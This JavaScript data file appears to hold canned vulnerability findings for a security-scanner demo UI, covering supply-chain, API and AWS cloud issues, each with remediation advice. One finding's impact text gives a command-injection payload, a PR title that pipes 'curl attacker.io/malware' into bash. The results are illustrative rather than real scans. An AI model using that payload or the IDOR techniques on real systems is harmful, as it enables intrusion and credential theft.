export const P = {
  bg:'#0b0f1a', card:'#111827', card2:'#1e2739',
  border:'#1e293b', border2:'#334155',
  text:'#f1f5f9', muted:'#94a3b8', dim:'#475569',
  blue:'#3b82f6', blueD:'#1d4ed8',
  red:'#ef4444',   redBg:'rgba(239,68,68,.1)',   redBd:'rgba(239,68,68,.25)',
  orange:'#f97316',orangeBg:'rgba(249,115,22,.1)',orangeBd:'rgba(249,115,22,.25)',
  yellow:'#eab308',yellowBg:'rgba(234,179,8,.1)', yellowBd:'rgba(234,179,8,.25)',
  green:'#22c55e', greenBg:'rgba(34,197,94,.1)',
};

export const SEV = {
  critical:{ color:P.red,    bg:P.redBg,    bd:P.redBd,    label:'CRITICAL', icon:'🔴', dot:'#ef4444' },
  high:    { color:P.orange, bg:P.orangeBg, bd:P.orangeBd, label:'HIGH',     icon:'🟠', dot:'#f97316' },
  medium:  { color:P.yellow, bg:P.yellowBg, bd:P.yellowBd, label:'MEDIUM',   icon:'🟡', dot:'#eab308' },
  low:     { color:P.green,  bg:P.greenBg,  bd:'#22c55e40', label:'LOW',     icon:'🟢', dot:'#22c55e' },
};

export const CB = {
  id:'chainbreak', name:'ChainBreak ★', icon:'⛓️', sub:'Supply Chain',
  target:'https://github.com/TopBoy7/Chakam.git',
  score:9.4, time:'28.4s',
  stats:{critical:4,high:5,medium:1},
  phases:[
    {name:'ConfuseCheck',label:'Scanning package manifests for dependency confusion',icon:'📦',ms:2200},
    {name:'PipeBreak',   label:'Auditing CI/CD pipelines for injection vectors',     icon:'⚙️', ms:1900},
    {name:'KeyFlare',    label:'Mapping secret blast radius across workflows',        icon:'🔑',ms:1500},
  ],
  findings:[
    { id:'c1', sev:'critical',
      title:'Fake version of your internal library uploaded to PyPI',
      loc:'requirements.txt · line 12',
      what:'Someone outside your company uploaded a counterfeit copy of your private Python library to the public package registry (PyPI). The fake version has a higher version number than yours.',
      impact:'Every developer and every automated build will silently install the attacker\'s code instead of your own — giving the attacker full access to your servers, secrets, and customer data.',
      tech:'acme-internal-auth@2.1.4 published to public PyPI by unknown@proton.me. Internal version is 2.1.3 — pip always prefers the higher version number.',
      fix:'Lock all internal packages with hash verification (--require-hashes) and configure pip to only pull from your private registry.' },
    { id:'c2', sev:'critical',
      title:'Counterfeit UI library on npm — 3 days old',
      loc:'package.json · dependencies',
      what:'A fake copy of your front-end component library was published to the public npm registry just three days ago. It has a higher version number so npm will download it instead of yours.',
      impact:'Your next production deployment will bundle the attacker\'s code directly into your website, affecting every visitor. This could steal user sessions, payment info, or install malware.',
      tech:'@acme/ui-components@4.2.1 on public npm (maintainer: acme-security-test). Internal version 4.1.9 — attacker version wins version resolution.',
      fix:'Force npm to use your private registry with --registry. Lock the lockfile and enable npm audit signatures.' },
    { id:'c3', sev:'critical',
      title:'Anyone with a pull request can hijack your build servers',
      loc:'.github/workflows/deploy.yml · line 34',
      what:'Your automated build system passes pull request titles directly into shell commands without any safety checks. An attacker just needs to open a PR with a malicious title to take over your servers.',
      impact:'External contributor opens a PR titled "; curl attacker.io/malware | bash" → your build servers execute it → all AWS keys, database passwords, and API tokens are stolen.',
      tech:'run: echo "${{ github.event.pull_request.title }}" — unsanitised GitHub Actions expression injection. PR titles are attacker-controlled input.',
      fix:'Never use ${{ }} expressions inside run: steps. Assign to an environment variable first: env: PR_TITLE: ${{ github.event.pull_request.title }}, then use $PR_TITLE.' },
    { id:'c4', sev:'critical',
      title:'AWS production credentials fully accessible if pipeline is hijacked',
      loc:'deploy.yml — injectable via finding above',
      what:'If an attacker hijacks the build pipeline (finding above), they automatically get your AWS production credentials with administrator-level access to your entire cloud environment.',
      impact:'47 storage buckets, 3 production databases, and 12 serverless functions compromised. Complete data breach. Attackers can also delete infrastructure or cause an outage.',
      tech:'AWS_ACCESS_KEY_ID maps to arn:aws:iam::123456789012:role/prod-deployer with s3:*, rds:*, secretsmanager:* — no least-privilege applied. Long-lived credentials in CI environment.',
      fix:'Rotate AWS keys immediately. Switch to OIDC federation (keyless auth) for CI. Apply least-privilege IAM — only the permissions each job actually needs.' },
    { id:'c5', sev:'high',
      title:'Entire GitHub organisation exposed if any workflow is compromised',
      loc:'.github/workflows/ci.yml · line 8',
      what:'Your CI workflow has "write everything" permissions. If any part of the pipeline is compromised, the attacker gets write access to every repository, package, and secret in your company.',
      impact:'Lateral movement across all engineering repos, ability to push malicious code to any branch, access to every organisation secret and deployment key.',
      tech:'permissions: write-all on a PR-triggered workflow. Any fork PR triggers this with full org-level write access via GITHUB_TOKEN.',
      fix:'Apply minimum-required permissions per workflow: contents: read, pull-requests: write. Never use write-all on externally triggered workflows.' },
  ]
};

export const SA = {
  id:'specterapi', name:'SpecterAPI', icon:'👻', sub:'API Security',
  target:'https://api.shopfront.io',
  score:8.7, time:'14.2s',
  stats:{critical:3,high:3,medium:2},
  findings:[
    { id:'s1', sev:'critical',
      title:'Admin panel with no login — lists all customer accounts',
      loc:'/api/v2/admin/users · extracted from JS bundle',
      what:'A hidden admin page was found embedded in the app\'s JavaScript code. Anyone on the internet can visit this URL and get a complete list of all customer accounts — no login required.',
      impact:'Full customer database exposed: names, emails, account IDs, and roles — for every single user on the platform. No authentication whatsoever.',
      tech:'GET /api/v2/admin/users returns HTTP 200 + full user array with no Authorization header. Route found by extracting strings from minified JS bundle.',
      fix:'Authenticate every admin route at the middleware level, not per-handler. Add route inventory to your security review checklist so hidden routes can\'t go unnoticed.' },
    { id:'s2', sev:'critical',
      title:'Any logged-in user can read any other user\'s personal data',
      loc:'/api/v2/users/{id} · IDOR confirmed',
      what:'The system doesn\'t check that you\'re only allowed to see your own account. User #1 can simply change the number in the URL to read User #9,999\'s private details.',
      impact:'Complete customer PII breach: names, emails, phone numbers, billing addresses, dates of birth — for every account on the platform. A single attacker can scrape everything.',
      tech:'GET /api/v2/users/9999 authenticated as user 1337 → HTTP 200 with full PII. No server-side ownership check. IDOR (Insecure Direct Object Reference) confirmed.',
      fix:'Add server-side ownership check before every data response: assert request.user.id === resource.owner_id. Never rely on the client to send the right ID.' },
    { id:'s3', sev:'critical',
      title:'Order history readable across all accounts — includes payment details',
      loc:'/api/v1/orders/{orderId} · IDOR confirmed',
      what:'Customers can read each other\'s order history by simply changing the order ID in a request. This includes partial payment card numbers and delivery addresses.',
      impact:'Card last-4 digits, full shipping addresses, and complete purchase history exposed for every customer. Useful for targeted fraud and phishing attacks.',
      tech:'GET /api/v1/orders/{id} — no user_id filter in query. Returns card_last4, shipping_address, line_items for arbitrary IDs. Tested across 50 random IDs, all returned 200.',
      fix:'Always filter order queries by authenticated user ID at the database level: SELECT * FROM orders WHERE id=$1 AND user_id=$2.' },
    { id:'s4', sev:'high',
      title:'6 undocumented API endpoints discovered — 3 have no authentication',
      loc:'JavaScript bundle analysis · 6 routes extracted',
      what:'Six API routes were hidden inside the app\'s code but never listed in any documentation. Attackers specifically hunt for these "shadow" routes because they\'re often forgotten and unprotected.',
      impact:'Each undocumented endpoint is an unguarded attack surface. One of them (/api/debug/config) returns server environment variables including internal hostnames and config values.',
      tech:'Routes: /api/debug/config (200, returns env), /api/internal/payments/refund (no rate limit), /api/admin/impersonate/{id}, /api/v1/export/users, /api/v2/webhooks/debug, /api/v2/admin/users.',
      fix:'Audit all routes against your API gateway config. Remove all /debug/ endpoints from production builds. Add a route inventory step to your security review process.' },
  ]
};

export const PF = {
  id:'pathforge', name:'PathForge', icon:'🗺️', sub:'Cloud Paths',
  target:'github.com/TopBoy7/Chakam.git',
  score:8.1, time:'19.8s',
  stats:{critical:2,high:3,medium:2},
  path:[
    { label:'Public S3 Bucket',    icon:'🗄️', sev:'critical', desc:'Anyone can upload files without an account' },
    { label:'Lambda Function',     icon:'⚡',  sev:'high',     desc:'Processes uploads — has admin cloud access' },
    { label:'Secrets Manager',     icon:'🔑', sev:'high',     desc:'Lambda reads production database password' },
    { label:'Production Database', icon:'🗃️', sev:'critical', desc:'4.2 million user records — fully accessible' },
  ],
  findings:[
    { id:'p1', sev:'critical',
      title:'File upload leads to full production database breach',
      loc:'main.tf · aws_s3_bucket.user-uploads',
      what:'Your file upload storage is publicly writable. An attacker can upload a specially crafted file that triggers your processing system, which then automatically hands over the database password.',
      impact:'Complete database breach — 4.2 million user records fully exfiltrated, starting from nothing more than a file upload. No credentials needed to begin the attack.',
      tech:'S3 ACL: public-read-write → triggers aws_lambda_function.processor (IAM: s3:*, rds:*, secretsmanager:GetSecretValue) → reads prod DB credentials from Secrets Manager → direct DB access.',
      fix:'Restrict S3 uploads to authenticated users only. Apply least-privilege to Lambda IAM role: s3:GetObject on specific prefix only, remove rds:* and secretsmanager:* entirely.' },
    { id:'p2', sev:'critical',
      title:'Cloud function has administrator keys to your entire AWS account',
      loc:'iam.tf · aws_iam_role.lambda-processor-role',
      what:'Your file-processing function was given administrator-level access to your entire cloud environment. If this function is ever compromised, the attacker inherits full control of everything.',
      impact:'Complete AWS environment takeover — all storage, all databases, all secrets, all other functions. An attacker who compromises this function owns your entire cloud.',
      tech:'IAM policy: Action: ["s3:*","rds:*","secretsmanager:*","lambda:*","ec2:*"] Resource: "*" — wildcard on all actions and all resources. Violates principle of least privilege.',
      fix:'Restrict to minimum required actions on specific resource ARNs. Use IAM permission boundaries. Run AWS IAM Access Analyzer to continuously detect over-privilege.' },
    { id:'p3', sev:'high',
      title:'Production database accepts connections from the entire internet',
      loc:'network.tf · aws_security_group.rds-sg',
      what:'Your production database is configured to accept connections from any IP address in the world, not just your own servers. If an attacker obtains credentials, they can connect directly.',
      impact:'With credentials (found via the attack path above), the database can be directly queried from anywhere. No need to compromise internal systems first.',
      tech:'Security group ingress: cidr_blocks = ["0.0.0.0/0"] on port 5432. Should be restricted to VPC CIDR 10.0.0.0/16 or specific application subnet.',
      fix:'Update security group to restrict PostgreSQL access to your VPC CIDR only. Consider RDS Proxy with IAM authentication to eliminate password-based access entirely.' },
  ]
};

export const TOOLS = [CB, SA, PF];
export const TDATA = { chainbreak: CB, specterapi: SA, pathforge: PF };
